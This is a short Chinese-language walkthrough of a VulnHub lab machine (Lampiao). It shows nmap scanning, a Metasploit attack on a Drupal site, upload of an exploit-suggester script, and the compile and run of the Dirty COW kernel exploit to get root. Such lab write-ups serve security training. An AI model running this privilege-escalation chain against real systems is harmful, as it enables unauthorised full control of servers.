Linux提权脏牛内核漏洞演示
通过这篇文章你将学会利用Linux的脏牛内核漏洞配合MSF提权
靶机下载地址:https://www.vulnhub.com/entry/lampiao-1,249/
攻击机:Kali 2022
靶机无密码 无图形化界面
攻击机Kali
攻击过程
Nmap 网段扫描
nmap扫描网段寻找存活IP
namp 192.168.75.0/24
扫描端口寻找存活端口 注意这里 "-p1-65535" 是扫描从1到65535的所有端口
nmap -p1-65535 192.168.75.144
Web渗透
Web站点
已知是知名CMS 利用kali进行攻击
首先发现192.168.76.141,开放的80端口,可以访问。在端口扫描中发现开放的1898端口并可以访问。1898端口的网页中有“Powered by Drupal”字样,> 搜索“drupal”确定是CMS。搜索drupal CMS的漏洞,可以在搜索引擎搜,或在msf搜索
show options
set rhost 192.168.75.144
set rport 1898
exploit
攻击成功
内网渗透
使用脚本进行信息收集——漏洞探针
脚本地址:https://github.com/mzet-/linux-exploit-suggester
上传漏洞探针脚本
upload /root/linux-exploit-suggester.sh /tmp/1.sh
进入shell命令 进去/tmp/文件夹使用1.sh
发现脏牛漏洞 下载或上传exp
下载地址:https://github.com/gbonacini/CVE-2016-5195
进入shell
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
python -c 'import pty; pty.spawn("/bin/bash")'
该exp需要一个交互式的终端,不然无法正常执行。这里开一个虚拟的交互终端
运行
./dcow
运行成功,dcow回显了一个root密码,用它登录
su root
在root文件夹下有flag
cat /root/flag.txt